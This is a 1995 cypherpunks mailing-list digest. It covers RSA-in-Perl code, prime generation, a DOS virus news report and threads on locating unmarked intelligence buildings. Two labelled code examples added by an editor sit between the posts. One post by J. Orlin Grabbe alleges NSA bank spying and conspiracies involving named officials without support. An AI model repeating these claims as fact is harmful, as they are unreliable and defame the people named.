$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365
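
The search loop described in the message above, as an added example that is not part of the post or of the RSA key generator it quotes: it starts from a random point and steps upward, but skips even candidates and runs trial division before the probabilistic rounds, which is the speed-up the message suggests. It is written in Python so it runs without GNU mp; Miller-Rabin as the probabilistic test, the function names and the small-prime bound of 2000 are assumptions of this example.

```python
import secrets


def _sieve(limit):
    """Primes <= limit by the sieve of Eratosthenes."""
    flags = bytearray([1]) * (limit + 1)
    flags[0] = flags[1] = 0
    for i in range(2, int(limit ** 0.5) + 1):
        if flags[i]:
            flags[i * i::i] = bytearray(len(range(i * i, limit + 1, i)))
    return [i for i, is_prime in enumerate(flags) if is_prime]


SMALL_PRIMES = _sieve(2000)  # bound chosen for this example


def trial_division(n):
    """True/False when small primes settle the question, None if undecided."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n == p:
            return True
        if n % p == 0:
            return False
    return None


def miller_rabin_witness(n, a):
    """True if base a proves that odd n > 2 is composite."""
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    x = pow(a, d, n)
    if x in (1, n - 1):
        return False
    for _ in range(s - 1):
        x = pow(x, 2, n)
        if x == n - 1:
            return False
    return True


def mr_passes(n, rounds):
    """Run `rounds` Miller-Rabin rounds with random bases in [2, n-2].
    A composite n survives a single round with probability at most 1/4."""
    for _ in range(rounds):
        a = 2 + secrets.randbelow(n - 3)
        if miller_rabin_witness(n, a):
            return False
    return True


def is_probable_prime(n, rounds=25):
    """Cheap trial division first, Miller-Rabin only if still undecided."""
    quick = trial_division(n)
    return quick if quick is not None else mr_passes(n, rounds)


def next_probable_prime(start, rounds=25):
    """Step upward from `start` over odd numbers only.

    Returns (prime, candidates_examined, candidates_given_to_miller_rabin)
    so the saving from the cheap pre-checks is visible.
    """
    if start <= 2:
        return 2, 1, 0
    n = start | 1  # first odd number >= start
    candidates = mr_tested = 0
    while True:
        candidates += 1
        verdict = trial_division(n)
        if verdict is None:
            mr_tested += 1
            verdict = mr_passes(n, rounds)
        if verdict:
            return n, candidates, mr_tested
        n += 2


def random_prime(bits, rounds=25):
    """Random starting point with the top and low bits set, then search up.
    Retries in the rare case the search runs past `bits` bits."""
    while True:
        start = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        p, _, _ = next_probable_prime(start, rounds)
        if p.bit_length() == bits:
            return p


if __name__ == "__main__":
    p, tried, tested = next_probable_prime(10 ** 12)
    print(p, "after", tried, "odd candidates,", tested, "reached Miller-Rabin")
    print(hex(random_prime(512)))
```

Searching upward from a random start does not pick primes uniformly: a prime that follows a long gap of composites is more likely to be returned than one that follows a short gap.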





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 8 Aug 95 17:23:00 PDT
To: cypherpunks@toad.com
Subject: QAK_qak
Message-ID: <199508090022.UAA00675@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-8-95. NYPaper (for paleo-galactic quackers):


   "New Survey of Sky Finds Most Quasars Are Equally Ancient:
   The strange objects may be an early stage of galaxy
   formation."

      The discovery of new evidence for the epoch of quasar
      proliferation was one of the important results of a
      10-year survey of quasars conducted by astronomers using
      the 200-inch Hale Telescope at Palomar Observatory in
      southern California. The findings were reported in the
      July issue of The Astronomical Journal by Dr. Maarten
      Schmidt of the California Institute of Technology, Dr.
      Donald P. Schneider of Pennsylvania State University and
      Dr. James E. Gunn of Princeton University. Other
      astronomers praised the research and noted that it
      generally confirmed the results of a complementary
      survey of the southern sky by a team led by Dr. Patrick
      Osmer, an astronomer at Ohio State University. Those
      observations, reported last year, were conducted at
      telescopes in Australia and Chile.


   QAK_qak






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kari Laine" <buster@klaine.pp.fi>
Date: Tue, 8 Aug 95 10:38:00 PDT
To: cypherpunks@toad.com
Subject: Re: hardware encryption
Message-ID: <199508081737.AA17967@personal.eunet.fi>
MIME-Version: 1.0
Content-Type: text/plain



> I'm looking for add-in cards that implement DES and/or RSA
> for either a PC (ISA/EISA/whatever) or a Sun (S-Bus),
> preferably a Sun. Also, the RSA card would need to implement
> a 1024 bit modulus.

uti-maco Belgium has some cards in that category:

Contact information:

uti-maco Belgium N.V.
De Vunt 9
B-3220 Holsbeek - Belgium

Phone +32-16-44 01 35
Fax +32-16-44 01 40
Compuserve: 100272,2772 (internet format: 100272.2772@compuserve.com)


Best Regards
Kari

Kari Laine          buster@klaine.pp.fi
LAN Vision Oy       Tel. +358-0-502 1947
Sinikalliontie 14   Fax  +358-0-524 149
02630 ESPOO         BBS  +358-0-502 1576/1456
FINLAND




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Tue, 8 Aug 95 18:05:42 PDT
To: cypherpunks@toad.com
Subject: RE: alt.politics.org.cia
Message-ID: <75175.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In message Tue, 8 Aug 95 14:25:20 EDT, Carl Ellison <cme@TIS.COM>  writes:
> project for finding unmarked spook buildings in your neighborhood and
> gathering a database (on the web?) of such.
> It's not a CP topic, but it's related and folks might want to check out
> that newsgroup.  (Thanks to r$ for the inspiration.)

It is definitely a stretch. But a web listing is probably the right idea.
I've already got some public spook information on my subpages, I think
I'll start collecting locations. I'll let someone else do the CGI map.

Nearly everyone knows that CIA has major offices in Roslyn VA. And
most are clued in to the Georgetown (a section of Washington DC)
"garbage garage" that was a CIA front (now it is a tony mall). There are
also CIA offices in Vienna VA, altho I have to admit I don't know exactly
where.  To find CIA offices, all you have to do is follow the blue busses.

DIA is marked, about a mile from the Pentagon.

But this raises a question (please, not to start a f-war)
as to what is a "spook"?  For example, the Secret Service has an unmarked
facility on 22 or 23rd street in NW Washington. They keep the Pres' limo,
etc there. Clearly from a standpoint of their clumsy raids (Pentagon City
2600, etc.) they classify as spooks.

Are contractors such as Mitre, E-Systems, and TRW, who do mega-dollars
of work each year considered spooks? I think some are, as they are
effectively out-sourced civil servants.

I guess I could simply walk into the Soviet Embassy and ask them
where the US spooks are. It isn't a secret from anyone but uninformed
citizens.

There is at least one Federal Building in each state, holding VA,
Dept of Ag, etc. Nearly all have FBI and other LEA offices.

Is there an ethical question buried here? Making it easy for another nut to
kill mere working stiffs by posting the locations?

Disclaimer:  I'm kinda split on this, I've been on this list a long time,
but my dad, wife, and brother work or worked in town for the government.
I hope that Tim's revolution is quiet and peaceful.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Levy" <AXEL@CONTED.Lan.McGill.CA>
Date: Tue, 8 Aug 95 19:26:11 PDT
To: cypherpunks@toad.com
Subject: www directory
Message-ID: <199508090222.WAA07725@sifon.CC.McGill.CA>
MIME-Version: 1.0
Content-Type: text/plain


is there a www directory?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul Foley" <paul@gec.co.nz>
Date: Tue, 8 Aug 95 05:41:25 PDT
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Re: RSA/Perl Shirts
Message-ID: <30273101.gec@gec.co.nz>
MIME-Version: 1.0
Content-Type: text


One thing I have to ask: Does wearing one of these shirts under
something else count as carrying a concealed weapon? :-)
-- 
Paul Foley                  <paul@gec.co.nz>           PGP key 0x0D1C0E75
-----------------There's no government like no government----------------
Where they burn books, in the end they will also burn people.
                                                        -- Heinrich Heine



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Tue, 8 Aug 95 19:44:09 PDT
To: cypherpunks@toad.com
Subject: Re: Once Upon a Midnight Dreary
In-Reply-To: <9508090001.AA15622@anon.penet.fi>
Message-ID: <199508090244.WAA11572@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



scythe writes:
> A poem based on E.A.Poe's The Raven.
> Abort, Retry, Ignore?
> By Anonymous

I see that you didn't succeed in learning much in the third grade
about reading. The letters "c y p h e r p u n k s" do not spell
"rec.humor.funny".

I would suggest "Hooked on Phonics" or some similar remedial reading
course.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 8 Aug 95 20:13:54 PDT
To: cypherpunks@toad.com
Subject: RE: alt.politics.org.cia
Message-ID: <199508090311.XAA05211@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Pat Farrell <pfarrell@netcom.com> wrote:

<snip>

>But this raises a question (please, not to start a f-war)
>as to what is a "spook"?

<snip>

>Are contractors such as Mitre, E-Systems, and TRW, who do mega-dollars
>of work each year considered spooks? I think some are, as they are
>effectively out-sourced civil servants.

I think the spook-test, to be fair, needs to be based on something
objective, like equipment carried or used. Guns are an easy "yes,"
as are certain listening devices, etc. Others can probably add to
this equipment list, and some of us, considering Mena, might include
drugs or large chunks of cash. I certainly would. <g>

>I guess I could simply walk into the Soviet Embassy and ask them
>where the US spooks are. It isn't a secret from anyone but uninformed
>citizens.

Amen. CIA office locations are much less "secret" in other countries
than they are in the US. Often, a taxi driver knows exactly where the
CIA "safehouses" are in many Latin-American countries.

<snip>

>Is there an ethical question buried here? Making it easy for another nut to
>kill mere working stiffs by posting the locations?

Yes, but these locations are no-doubt easy for motivated nuts to find.
"Military secrets are the most fleeting kind." [Spock on "Star Trek"]

>Disclaimer:  I'm kinda split on this, I've been on this list a long time,
>but my dad, wife, and brother work or worked in town for the government.
>I hope that Tim's revolution is quite and peaceful.

AGREED!
If it's not, it will fail. "War is the health of the state." [I forget
who said that.] Contra the many raving media accounts, the vast majority 
in the libertarian/"anarchist" movement were and are quite opposed to
the idea of vigilante-murder through bombing Federal buildings full
of mere working stiffs, especially those of us who just happened to
be working in a Federal Building. 
[I was. It wasn't any fun that day...] :-(
JMR
<snip>


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMCgiSW1lp8bpvW01AQHSVQQAn6fdXfLMlCA9RLNJpr9N3CqrwmdEmTXZ
95yAdIHiOwkzjg7pvTcBIuifnLV0pdDHO0f+BXHiw2BW06ED8rK+nJIZm0OmVsIL
FVnaWCGEVDc9SrSYByrwy5s5nM/g30L8wRQeo7yAKg/0w5zUR4WOaQrKcnLBDaPO
4P42ckNkg8k=
=3+HE
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCgnTyoZzwIn1bdtAQGjOAGA25mHQfQvxsgc8TR+34tGK1BAUB4egwJR
N3tNre54vJT2QkxQ/l0rMlPblYbcIbWE
=Sm3E
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Tue, 8 Aug 95 21:24:03 PDT
To: cypherpunks@toad.com
Subject: RE: alt.politics.org.cia
Message-ID: <199508090428.XAA06937@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>In message Tue, 8 Aug 95 14:25:20 EDT, Carl Ellison <cme@TIS.COM>  writes:
>> project for finding unmarked spook buildings in your neighborhood and
>> gathering a database (on the web?) of such.

Well, I've got some Web space still free.... :-)

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 8 Aug 95 23:56:05 PDT
To: cypherpunks@toad.com
Subject: Dir.Byway Virus (NewsClip)
Message-ID: <199508090639.XAA16760@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Is this legit?

----------

New Computer Virus Attacks "Everything"


Burlington, Mass. Aug. 7 -- A new, hazardous computer virus is
spreading, that takes control of disk operations from
Microsoft MS-DOS or IBM PC-DOS based systems, the anti-virus
research team at S&S Software International is reporting. The
virus, dubbed "Dir.Byway," is described as a super-fast,
polymorphic infector affecting desktops, notebooks, and even 
computer networks.

Pat Bitton, S&S Software vice president of marketing, told
Newsbytes the virus is a very "dangerous" one. Because it is
polymorphic, it mutates with each attack, making it extremely
hard to diagnose and kill. The virus operates as if it is a
TSR (terminate and stay resident) program, infecting .COM and
.EXE files when the home directory of an executable file is
accessed, officials said.

Infection is not confined to the default home directory
either; the virus infects all executables in all directories of a
search path. In addition, the access does not need to launch
an application. Any kind of access triggers the virus, like
looking at a simple directory listing.

This ability to infect everything in its path makes Dir.Byway
a "super-fast" infector, officials added.

The virus creates a file called "CHKLIST . MS" (without
quotes, but with spaces surrounding the period) in the root
directory, and cross links all infected executable files,
David Emm, customer service manager, told Newsbytes. This then
replaces the normal DOS directory entries, making "CHKLIST .
MS" the start-cluster for every infected file.

If the user deletes the file, it reappears when any infected
file is executed. Also, if the user boots from a clean DOS
disk and runs "CHKDSK," the computer will report a large
number of cross-linked files. If the user boots from the
infected hard drive, the computer will report no errors. A
listing of the root directory using the command "dir/ahs"
(without quotes) will show the "CHKLIST . MS" file.

Dir.Byway triggers if the current DOS date is set to the year
1996 or above, and the day of the month is equal to the
month's number multiplied by two and two is added, like in
01-14-96 or 12-26-96. When triggered, the virus displays a
string of text every three hours, on hours that are a multiple
of three in military time -- for example, 09:00, 12:00, and
18:00. The text says: "Trabajeoms Todos Por Venezuela." S&S
officials said this translates to "We are all working for
Venezuela." On multimedia systems, this is accompanied by a
song that resembles the country's national anthem.

Emm said he is more worried about the spread of the virus for
now than the triggering of it, because it is so dangerous. He
told Newsbytes the virus has been detected in the United
Kingdom and the United States.

Bitton said the company's "Dr. Solomon's Anti-Virus Toolkit"
will remove the virus from infected computers. New versions of
the Toolkit for DOS, Windows, OS/2, and NetWare are slated to
ship in late summer. S&S also plans Fall 1995 introductions of
Toolkits for Macintosh, SCO Unix, Windows 95, and Windows NT
server and workstations.
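
[Added example, not part of the original post or of any S&S tool.] The
cross-linking the article describes shows up on disk as several directory
entries whose start-cluster field holds the same value. The Python sketch
below parses raw 32-byte FAT12/16 directory entries and reports clusters that
an executable shares with another file. The directory contents, file names,
cluster numbers and the stored spelling of the CHKLIST entry are constructed
sample data.

```python
import struct
from collections import defaultdict

ENTRY_SIZE = 32          # size of one FAT12/16 directory entry
ATTR_VOLUME_ID = 0x08
ATTR_DIRECTORY = 0x10
ATTR_LFN = 0x0F          # long-file-name slot used by later FAT variants


def parse_dir_entries(raw):
    """Yield (base, ext, attr, start_cluster, size) for each live entry."""
    for off in range(0, len(raw) - ENTRY_SIZE + 1, ENTRY_SIZE):
        entry = raw[off:off + ENTRY_SIZE]
        if entry[0] == 0x00:          # end-of-directory marker
            break
        if entry[0] == 0xE5:          # deleted entry
            continue
        attr = entry[11]
        if (attr & ATTR_LFN) == ATTR_LFN or attr & ATTR_VOLUME_ID:
            continue
        base = entry[0:8].decode("ascii", "replace").rstrip()
        ext = entry[8:11].decode("ascii", "replace").rstrip()
        # start cluster: 16-bit LE at offset 26; file size: 32-bit LE at 28
        start_cluster, size = struct.unpack_from("<HI", entry, 26)
        yield base, ext, attr, start_cluster, size


def cross_linked(raw, exts=("COM", "EXE")):
    """Return {start_cluster: [names]} where a .COM/.EXE file shares its
    start cluster with at least one other file in the same directory."""
    by_cluster = defaultdict(list)
    for base, ext, attr, cluster, _size in parse_dir_entries(raw):
        if attr & ATTR_DIRECTORY or cluster < 2:   # clusters 0 and 1 are reserved
            continue
        by_cluster[cluster].append((base, ext))
    return {
        cluster: [f"{b}.{e}" if e else b for b, e in files]
        for cluster, files in by_cluster.items()
        if len(files) > 1 and any(e in exts for _b, e in files)
    }


def _entry(base, ext, attr, cluster, size):
    """Build one directory entry (helper for the constructed samples)."""
    e = bytearray(ENTRY_SIZE)
    e[0:8] = base.ljust(8).encode("ascii")
    e[8:11] = ext.ljust(3).encode("ascii")
    e[11] = attr
    struct.pack_into("<HI", e, 26, cluster, size)
    return bytes(e)


# Constructed root directory: three entries point at cluster 731.
SAMPLE_INFECTED = b"".join([
    _entry("IO", "SYS", 0x07, 2, 40566),
    _entry("CHKLIST", "MS", 0x06, 731, 2048),      # hidden + system
    _entry("COMMAND", "COM", 0x20, 731, 54645),
    _entry("EDIT", "EXE", 0x20, 731, 413),
    _entry("README", "TXT", 0x20, 90, 1200),
    _entry("DOS", "", ATTR_DIRECTORY, 120, 0),     # subdirectory, ignored
    b"\xe5" + _entry("OLD", "EXE", 0x20, 731, 10)[1:],   # deleted, ignored
    _entry("FORMAT", "COM", 0x20, 140, 22916),
]) + bytes(ENTRY_SIZE)                              # end-of-directory marker

# Constructed root directory with every file on its own start cluster.
SAMPLE_CLEAN = b"".join([
    _entry("COMMAND", "COM", 0x20, 300, 54645),
    _entry("EDIT", "EXE", 0x20, 310, 413),
    _entry("README", "TXT", 0x20, 90, 1200),
]) + bytes(ENTRY_SIZE)

if __name__ == "__main__":
    for cluster, names in cross_linked(SAMPLE_INFECTED).items():
        print(f"cluster {cluster} shared by: {', '.join(names)}")
```

The article says a system booted from the infected drive reports no errors,
so a check like this only means something when run against directory sectors
read after a clean boot or from an offline image. It covers one directory's
start clusters; CHKDSK's cross-link report follows the whole FAT chain.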











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Tue, 8 Aug 95 21:40:35 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Prime Number Gen's.
In-Reply-To: <15295.9508081711@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.3.89.9508082313.C4312-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 8 Aug 1995 aba@atlas.ex.ac.uk wrote:

> 
> "Rev. Ben" <samman@cs.yale.edu> writes on cpunks:
> > Does anyone know of where I could get source, royalty free, in the US for 
> > a good Prime Number Generator?
> 
> GNU code sounds like it would fit the royalty free bill.
> 
> Try the GNU multi-precision library: gmp-1.3.2.tar.gz from all good
> GNU sources.  I get my stuff from ftp://src.doc.ic.ac.uk/gnu/ if you
> don't have a GNU ftp site to hand.
> 
> There's a function
> 
> 	int mpz_probab_prime_p(mpnum, SURETY)
> 
> which returns true if the prime passes SURETY probabilistic prime tests.
> 
> I think if it passes say 25 tests, then there will be less than a
> 1/2^25 chance that it is not prime.
> 
> Also, on:
> 
> 	http://dcs.ex.ac.uk/~aba/rsa-keygen.html
> 

The proper thing to do is to then search for a number which demonstrates 
p is prime....

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an224850@anon.penet.fi (scythe)
Date: Tue, 8 Aug 95 17:18:40 PDT
To: cypherpunks@toad.com
Subject: Once Upon a Midnight Dreary
Message-ID: <9508090001.AA15622@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain




A poem based on E.A.Poe's The Raven.
Abort, Retry, Ignore?
By Anonymous

Once upon a midnight dreary, fingers cramped and vision bleary,
System manuals piled high and wasted paper on the floor,
Longing for the warmth of bed sheets, still I sat there doing spreadsheets.
Having reached the bottom line I took a floppy from the drawer
I then invoked the SAVE command and waited for the disk to store,
Only this and nothing more.

Deep into the monitor peering, long I sat there wond'ring, fearing.
Doubting, while the disk kept churning, turning yet to churn some more.
But the silence was unbroken, and the stillness gave no token.
"Save!" I said, "You cursed mother! Save my data from before!"
One thing did the phosphors answer, only this and nothing more,
Just, "Abort, Retry, Ignore?"

Was this some occult illusion, some maniacal intrusion?
These were choices undesired, ones I'd never faced before.
Carefully I weighed the choices as the disk made impish noises.
The cursor flashed, insistent, waiting, baiting me to type some more.
Clearly I must press a key, choosing one and nothing more, 
From "Abort, Retry, Ignore?"

With fingers pale and trembling, slowly toward the keyboard bending,
Longing for a happy ending, hoping all would be restored,
Praying for some guarantee, timidly, I pressed a key.
But on the screen there still persisted words appearing as before.
Ghastly grim they blinked and taunted, haunted, as my patience wore,
Saying "Abort, Retry, Ignore?"

I tried to catch the chips off guard, and pressed again, but twice as hard.
I pleaded with the cursed machine: I begged and cried and then I swore.
Now in mighty desperation, trying random combinations,
Still there came the incantation, just as senseless as before.
Cursor blinking, angrily winking, blinking nonsense as before.
Reading, "Abort, Retry, Ignore?"

There I sat, distraught, exhausted, by my own machine accosted.
Getting up I turned away and paced across the office floor.
And then I saw a dreadful sight: a lightning bolt cut through the night.
A gasp of horror overtook me, shook me to my very core.
The lightning zapped my previous data, lost and gone forevermore.
Not even, "Abort, Retry, Ignore?"

To this day I do not know the place to which lost data go.
What demonic nether world is wrought where lost data will be stored,
Beyond the reach of mortal souls, beyond the ether, into black holes?
But sure as there's C, Pascal, Lotus, Ashton-Tate and more,
You will one day be left to wander, lost on some Plutonian shore,
Pleading, "Abort, Retry, Ignore?"



----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Tue, 8 Aug 95 22:45:57 PDT
To: cypherpunks@toad.com
Subject: How To Spot a Spook page
Message-ID: <199508090550.AAA07775@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


As a start on a Web page, here are some things I thought of. What else? What
are the initials of some of the world's intelligence groups (CIA, NSA, KGB,
DGI, MI5(?), ???)

1> Antennas - more than TV/Ham/CB/Satellite (or 'unusually' shaped antennas).
2> No, or *very* few, visitors (esp. kids)
3> Visitors are seldom the same, or almost always the same.
4> Doesn't talk about job/company.
5> Activity at 'unusual' times.
6> Not very 'sociable' (keep to themselves).

Or, tell me to forget it, it doesn't belong here.... :-/

Dave
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KALLISTE@delphi.com
Date: Tue, 8 Aug 95 22:00:10 PDT
To: cypherpunks@toad.com
Subject: Only 1/3 of Government Computers Down So Far
Message-ID: <01HTUMY1W4UA91Y3J0@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

	   Allegations Regarding Vince Foster, the NSA, and
		Banking Transactions Spying, Part XV

			  by J. Orlin Grabbe

	The world of money laundering is a difficult one.  What are you 
going to do when your wire transfers to the Caribbean and other offshore 
centers won't go through?  What are you going to do when one-third (as of
August 8, 1995) of certain government computers are down with a virus?  Or 
is it a worm?  Or an octopus?  

	Did the NSA, in its zeal to modify the PROMIS software to spy on 
banking and other transactions, create a massive security hole in computer
systems sending wire transfers?   

	Well, I do hear it is a nice time to go vacationing in the islands, 
even for day trips!  Perhaps FinCEN could relocate to Havana?

	[Note to Julie Franklin:  Over here in Reno, we're always last to
get the news.  Well, I'm a taxpayer.  *Please* put me on your list. In the 
future please fax all computer disconnect info to 702-829-0852.  Thanks.]

	Which brings us to the subject of Ed Meese.  At the end of Reagan's
second term as governor of California, Meese needed a new job. He worked at 
Rohr Industries for a while.  But it didn't suit him, so *Richard Mellon 
Scaife* set up the San Diego Center for Criminal Justice on condition that 
Ed Meese be its Director, a post Meese held 1977-1980.   

	Later, after Ed Meese became Attorney General of the U.S. and
the people-tracking PROMIS software was stolen by the U.S. Justice 
Department using (according to a federal bankruptcy judge) "trickery, deceit, 
and fraud", Ed Meese's friend Earl Brian--then owner of Financial News 
Network, UPI, and Hadron corporation--proceeded to market the software all 
over the world, as well as to U.S. intelligence and law enforcement agencies.

	One agency that acquired the software was FEMA, the Federal  
Emergency Management Agency, which proceeded to create a data base of
political dissidents to be rounded up in event of a national emergency.
(Like any information, once collected it found multiple uses.) This data 
base was called MAINCORE, and the FEMA MAINCORE system was operated out of 
the basement of a building in Culpeper, VA.  

	Journalist Danny Casolaro, with the help of Alan Standorf, was able 
to get printouts of this totalitarian application of the PROMIS software 
just prior to his demise.  (When a member of congress attempted to question 
Oliver North about the FEMA MAINCORE data base, he was rudely shouted down 
by the chairman of the investigative committee.)

	Another agency that put the software to use was the Wackenhut
Corporation. It used the enhanced PROMIS to keep track of critics of the 
nuclear industry, an area in which *Richard Mellon Scaife* has a vested 
financial interest.

	Now Mellon bank in Pittsburgh finds itself embroiled in very
serious money laundering charges.

	Do these facts explain why the Little-Rock connection to the 
theft and modification of the PROMIS software for the purpose of spying
on banking transactions is a subject carefully avoided in Scaife-sponsored 
political advertisements?  

	Is this why the Mena-drug-smuggling, Little-Rock-money-laundering
operation allegedly stops with Bill Clinton?  
		    
	Is this why the connection of Vince Foster both to bank spying and 
nuclear espionage has been carefully downplayed?  

	Do Scaife's investments in the "terrorism industry" have anything 
to do with recent media hyping of the imminent threat to the U.S. of 
"international" terrorism?  

	Scaife's exposing of the sins of the Democrats has certainly 
served a useful purpose.  But don't think the story stops with Bill
Clinton.

	Perhaps the reason that Mr. Kenneth Starr's independent 
investigation into the Whitewater affair has gone so slowly is that 
Mr. Starr, in order to nail Bill Clinton, has to also nail a number 
of high-ranking Republicans?  

	Well, Mr. Starr, let the facts fall where they may.  I have 
confidence in you.  You do want to be Attorney General someday, don't 
you?  If you can find your way to do the right thing, you'll certainly 
deserve the position.

	Otherwise the wily hackers of the world may have to do your job
for you. 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMChlMWX1Kn9BepeVAQHbhgP/bSlSNnUClp4HPEDiB22JGHrqvMa5B6h8
LW0rR7eZdD2ub9CUj/HBfIrnU4mekw6MfmExxuy+mva1Z5MPsZKuE1qvxWBFHK5S
TzMFsPBsZNPH2GEDIQHZp/rIQeKYDsfjOp1OLVUPD9MA4tlTOQPgQ5RVzzKi+tEF
K1+Uxvy1lQ4=
=5pPJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Tue, 8 Aug 95 23:12:29 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: How To Spot a Spook page
In-Reply-To: <199508090550.AAA07775@arnet.arn.net>
Message-ID: <Pine.ULT.3.91.950809011155.19520D-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 9 Aug 1995, David K. Merriman wrote:

> 1> Antennas - more than TV/Ham/CB/Satellite (or 'unusually' shaped antennas).
> 2> No, or *very* few, visitors (esp. kids)
> 3> Visitors are seldom the same, or almost always the same.
> 4> Doesn't talk about job/company.
> 5> Activity at 'unusual' times.
> 6> Not very 'sociable' (keep to themselves).

Uh, if you look at that, that is EXACTLY identical to the majority of 
computer geeks :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMCg1tTokqlyVGmCFAQEjZwP/e28pd4BOGmKy+Tpl1w1S17liHpAIqXc2
6FW5qE8qz5o362UPOMdeWSojbghxTlcIPN/pGNKgKIaULo7bxIe/y6fMwCtPAVCa
HTxpOgZNqLqh77mqxNDYCJKHsaloA5VN2zQZoktLj4HcK/H9aqR/siI9fx6c1aDv
u8r/q2WttuY=
=DqzK
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Wed, 9 Aug 95 01:02:01 PDT
To: cypherpunks@toad.com
